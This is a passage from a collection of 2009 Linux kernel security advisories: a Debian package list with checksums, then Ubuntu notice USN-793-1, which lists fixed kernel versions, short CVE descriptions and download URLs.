http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum: 19589510 ed83c2d0ba92a0f4b5fb5daed6b86d5c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:   347746 23befd72e069faf404ede7a276b78311\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:  3647494 9cf283a4c89c8281db35e5fb2ace4335\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:    82384 199633269844e3e36cf936f5a63857a7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:   361018 4f7299551139e79ad329057ff07de93d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:   359956 5272e0df584721713692ccb80e8fdc45\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:   361502 4c9a0586154b5fce6d50610d6728bf75\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum: 19278068 41f6b91dceeaba5592a15bdbb4170c3a\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum:    82360 e96d164aa97cbda5c4e0d4a4d8d47298\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum:  3570154 a7bdb15fd5dc46ea33b570390700255a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum: 32289122 8a66a1efccab804aece0f9c9f9a0c2c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum:    82378 11c070123743f3060aee864a6fa7621e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum:   322394 7e68b691385f67de57eca947718b3cf3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum: 32112122 81952edc15d24552bc7e0e250d4e4c2f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch2_ia64.deb\n    Size/MD5 checksum:   322756 0332b3131abca0dde23a3980e3269d6a\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum: 22151540 85f675d6aa5e858c776b25ed7b55fd01\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum: 17152584 968f51589e2246eb98d54f8f7a0deac3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:   246524 7d37dee7fa5f20d5484a054697944a4a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum: 11958562 189d907c882ca1f971e5df5b020db861\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:   246320 9b22546464feae45ee05c1318ce4eeb1\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:   214790 9f3182d818ff7b6a05993763a6120725\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum: 17168120 bc71f4391f0b74712a77ce0a98104c42\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:    82240 56ffbcabce3c1df699ab5005b86b5fcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum: 10524568 1dcc5f02fea750b73b3d26bbf9436744\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:   309414 2f3e51dd53a0aee437acd14822bdc812\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:    82294 9d3e3e23c0fc8a0f1e1841e28fd3a2e2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:  3803692 496de2fac6b2631145112d3df8c30a74\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:   309366 ad8430704237cac6706abefb3cb3a66a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum:   225310 6f208c9d5eada9b92d3e98530a7421ab\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mips.deb\n    Size/MD5 checksum: 27775866 480af1976cfb2ad886bbeab57828e0a9\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum: 26985726 697670a3bb624d4d3d78f46f3dd1ffa0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum: 16630534 64876417bfc90be839f742b7f3df4017\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:    82296 3b389589e0d350fd94e1e6a55064b597\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:   246006 6b907d81792642929e73f8f7138a0686\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:    82244 06ea877ec50d7981c308674e878de0fd\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum: 21734936 1f58a04e3f3e233fc379f7585b37f67c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:   309876 33999e485bc68c26f1355c34591fa9d1\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:   246316 f5ee5c81b6f69590e7483c63914aa4f1\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum: 13317230 d5c0090dd1f3487c1a1b98e663d302a9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:  3803662 c04871193e6cd5fe88e7d757fe94dc15\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:   246138 83d394f1c4638687b1bd71213d6fc9fd\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum: 16566994 4ad893a3f64121974125e7df7a246c32\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch2_mipsel.deb\n    Size/MD5 checksum:   308542 d1aa85d73a85243f9e11e6d319829560\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum: 17459600 932f0c6e71fa2a92bcbf91245d4a6f34\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum: 19195098 3894f438fae8ccd897ae1b193e05a06c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum: 19486104 e186a5e57fc6ef416a9f0611b4e32b00\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:   321892 920d908f2b7f39a4ea245a452707de9c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:   321508 053a1e68eb59bc3616762c77c478b77c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:  3672616 9480b5733676cd5d73e984cd6b36cdb2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum: 21169994 225176293c099a0a66a6e427f8f342c9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:   321100 ed5daac657617ab8ea09dedbbd5825e9\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:    82240 d5758f3021b63ba5a46f4bb59a0264bd\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:    82278 68134af3769b6654c610701382a41932\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch2_powerpc.deb\n    Size/MD5 checksum:   294694 6e01dfd311f1094cb5cf39e6ab13030f\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:  1502142 d742c3ccecaeae89dd72efa337ad8d77\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:   194364 95a4fc8d1329f3926c95d0d866ea95c1\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:  3429940 46b5705e72023ec8eabbeaaae179df0f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:   194060 0c71ba7ea8c4108e88ce439c83e36101\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:    82228 f6a160399eb50aed5c7ce0a802977eec\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:    82242 20fa5214b693fd929327b65dff5ec749\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:  7200766 c6697bcd7109bad0fd2742368bfc7173\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch2_s390.deb\n    Size/MD5 checksum:  6950228 2c118466985f0d41c074e3d7ae019d4e\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum:    82354 917940e7cc2b2ae64b7b13119c8d5cdf\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum:   263544 e8b14218397904ab5f792a659c713900\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum: 13317316 74c832fd75da1e42442c1fc2fb985454\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum:  3650988 92f721bff0660a92cff31845e3db2b09\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum:   261690 519b6d40d8fc3af21f475b10bfaef609\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum:    82374 8ff85603936f91294ec959d8fbca1db5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch2_sparc.deb\n    Size/MD5 checksum: 13019920 db00ad3ea888c38b94f6e9c2aebbd834\n\n\n  These changes will probably be included in the oldstable distribution on\n  its next update. ===========================================================\nUbuntu Security Notice USN-793-1              July 02, 2009\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-1072, CVE-2009-1184, CVE-2009-1192, CVE-2009-1242,\nCVE-2009-1265, CVE-2009-1336, CVE-2009-1337, CVE-2009-1338,\nCVE-2009-1360, CVE-2009-1385, CVE-2009-1439, CVE-2009-1630,\nCVE-2009-1633, CVE-2009-1914, CVE-2009-1961\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-54-386       2.6.15-54.77\n  linux-image-2.6.15-54-686       2.6.15-54.77\n  linux-image-2.6.15-54-amd64-generic  2.6.15-54.77\n  linux-image-2.6.15-54-amd64-k8  2.6.15-54.77\n  linux-image-2.6.15-54-amd64-server  2.6.15-54.77\n  linux-image-2.6.15-54-amd64-xeon  2.6.15-54.77\n  linux-image-2.6.15-54-hppa32    2.6.15-54.77\n  linux-image-2.6.15-54-hppa32-smp  2.6.15-54.77\n  linux-image-2.6.15-54-hppa64    2.6.15-54.77\n  linux-image-2.6.15-54-hppa64-smp  2.6.15-54.77\n  linux-image-2.6.15-54-itanium   2.6.15-54.77\n  linux-image-2.6.15-54-itanium-smp  2.6.15-54.77\n  linux-image-2.6.15-54-k7        2.6.15-54.77\n  linux-image-2.6.15-54-mckinley  2.6.15-54.77\n  linux-image-2.6.15-54-mckinley-smp  2.6.15-54.77\n  linux-image-2.6.15-54-powerpc   2.6.15-54.77\n  linux-image-2.6.15-54-powerpc-smp  2.6.15-54.77\n  linux-image-2.6.15-54-powerpc64-smp  2.6.15-54.77\n  linux-image-2.6.15-54-server    2.6.15-54.77\n  linux-image-2.6.15-54-server-bigiron  2.6.15-54.77\n  linux-image-2.6.15-54-sparc64   2.6.15-54.77\n  linux-image-2.6.15-54-sparc64-smp  2.6.15-54.77\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-24-386       2.6.24-24.55\n  linux-image-2.6.24-24-generic   2.6.24-24.55\n  linux-image-2.6.24-24-hppa32    2.6.24-24.55\n  linux-image-2.6.24-24-hppa64    2.6.24-24.55\n  linux-image-2.6.24-24-itanium   2.6.24-24.55\n  linux-image-2.6.24-24-lpia      2.6.24-24.55\n  linux-image-2.6.24-24-lpiacompat  2.6.24-24.55\n  linux-image-2.6.24-24-mckinley  2.6.24-24.55\n  linux-image-2.6.24-24-openvz    2.6.24-24.55\n  linux-image-2.6.24-24-powerpc   2.6.24-24.55\n  linux-image-2.6.24-24-powerpc-smp  2.6.24-24.55\n  linux-image-2.6.24-24-powerpc64-smp  2.6.24-24.55\n  linux-image-2.6.24-24-rt        2.6.24-24.55\n  linux-image-2.6.24-24-server    2.6.24-24.55\n  linux-image-2.6.24-24-sparc64   2.6.24-24.55\n  linux-image-2.6.24-24-sparc64-smp  2.6.24-24.55\n  linux-image-2.6.24-24-virtual   2.6.24-24.55\n  linux-image-2.6.24-24-xen       2.6.24-24.55\n\nUbuntu 8.10:\n  linux-image-2.6.27-14-generic   2.6.27-14.35\n  linux-image-2.6.27-14-server    2.6.27-14.35\n  linux-image-2.6.27-14-virtual   2.6.27-14.35\n\nUbuntu 9.04:\n  linux-image-2.6.28-13-generic   2.6.28-13.45\n  linux-image-2.6.28-13-imx51     2.6.28-13.45\n  linux-image-2.6.28-13-iop32x    2.6.28-13.45\n  linux-image-2.6.28-13-ixp4xx    2.6.28-13.45\n  linux-image-2.6.28-13-lpia      2.6.28-13.45\n  linux-image-2.6.28-13-server    2.6.28-13.45\n  linux-image-2.6.28-13-versatile  2.6.28-13.45\n  linux-image-2.6.28-13-virtual   2.6.28-13.45\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change for Ubuntu 8.04 and 8.10,\nthe kernel updates have been given a new version number, which requires\nyou to recompile and reinstall all third party kernel modules you\nmight have installed. Unless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-server, linux-powerpc), a standard system\nupgrade will automatically perform this as well. \n\nDetails follow:\n\nIgor Zhbanov discovered that NFS clients were able to create device nodes\neven when root_squash was enabled.  An authenticated remote attacker\ncould create device nodes with open permissions, leading to a loss of\nprivacy or escalation of privileges. Only Ubuntu 8.10 and 9.04 were\naffected. (CVE-2009-1072)\n\nDan Carpenter discovered that SELinux did not correctly handle\ncertain network checks when running with compat_net=1.  A local\nattacker could exploit this to bypass network checks.  Default Ubuntu\ninstallations do not enable SELinux, and only Ubuntu 8.10 and 9.04 were\naffected. (CVE-2009-1184)\n\nShaohua Li discovered that memory was not correctly initialized in the\nAGP subsystem.  A local attacker could potentially read kernel memory,\nleading to a loss of privacy. (CVE-2009-1192)\n\nBenjamin Gilbert discovered that the VMX implementation of KVM did\nnot correctly handle certain registers.  This only affected 32bit hosts. Ubuntu 6.06 was not\naffected. (CVE-2009-1242)\n\nThomas Pollet discovered that the Amateur Radio X.25 Packet Layer Protocol\ndid not correctly validate certain fields.  A remote attacker could exploit\nthis to read kernel memory, leading to a loss of privacy. (CVE-2009-1265)\n\nTrond Myklebust discovered that NFS did not correctly handle certain\nlong filenames. Only Ubuntu 6.06\nwas affected. (CVE-2009-1336)\n\nOleg Nesterov discovered that the kernel did not correctly handle\nCAP_KILL. (CVE-2009-1337)\n\nDaniel Hokka Zakrisson discovered that signal handling was not correctly\nlimited to process namespaces. Only Ubuntu 8.04\nwas affected. (CVE-2009-1338)\n\nPavel Emelyanov discovered that network namespace support for IPv6 was\nnot correctly handled. Only Ubuntu 8.10 and 9.04 were affected. (CVE-2009-1360)\n\nNeil Horman discovered that the e1000 network driver did not correctly\nvalidate certain fields. (CVE-2009-1385)\n\nPavan Naregundi discovered that CIFS did not correctly check lengths\nwhen handling certain mount requests. (CVE-2009-1439)\n\nSimon Vallet and Frank Filz discovered that execute permissions were\nnot correctly handled by NFSv4.  A local user could bypass permissions\nand run restricted programs, possibly leading to an escalation of\nprivileges. (CVE-2009-1633)\n\nMikulas Patocka discovered that /proc/iomem was not correctly\ninitialized on Sparc. Ubuntu 6.06 was not\naffected. (CVE-2009-1914)\n\nMiklos Szeredi discovered that OCFS2 did not correctly handle certain\nsplice operations. Ubuntu 6.06 was not\naffected. (CVE-2009-1961)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.diff.gz\n      Size/MD5:  3001537 eba4f5e0c7a98a38dea67bfa3e168240\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77.dsc\n      Size/MD5:     2400 4ddbb75d160d27e0385fbabe7f1ee16a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-54.77_all.deb\n      Size/MD5:  5167494 b57a1f066e6e27335636d97032bac1e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-54.77_all.deb\n      Size/MD5:    95350 6585056cad015d6ca7e28ab593cd8b69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-54.77_all.deb\n      Size/MD5: 44742940 96f1bf40f8e1197b05d8cc2892f2c145\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    22354 a8efeb55cc67813d523cce4e9a8540ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    44770 ceb8d616dcdd3e0acd2c5f1bc0957167\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:     2306 13cb4639cc7517e3111efdea783b906e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    36252 5ef331e5a71c799d054ed67e1af7afb6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   102298 94937c4a9294258227c971c9c5e05c5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    38894 eb294ea73d31f1c2f9fda6618ec63770\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    49144 b633a70773bbbe8acf959b99056c8117\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   176712 02c0b79f0fa0b1ebf343781974474a4e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    36776 8a9d598a72f8199cafd120f3aec583c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   142248 3adf2b7652974e829eaeb41d822a5011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    51070 25ec529d7f82bfb0ddcd981304434934\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   140616 bf360bdcf71309b158123ce3070aaaf9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   286860 041ee91c6050c552bd52930dfb7c9f6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    97798 b66af76803a50cf7a3b22c2fbb9f00b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:  1651646 756c6cea34752f0bf7a1e829db020e57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb\n      Size/MD5:   871700 f51a4a973ece89338d4843d27a5ced94\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb\n      Size/MD5:   872620 cef392fe29c4a2dcfa1ffb9607f990eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb\n      Size/MD5:   872046 e9a140b82a6800dd7c08d8b744e75e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb\n      Size/MD5:   872590 46b39ade35d2e36728d913fe84b6f79d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_amd64.deb\n      Size/MD5:  6925720 a40915984f97b8e817774d8d56155484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-generic_2.6.15-54.77_amd64.deb\n      Size/MD5: 20816072 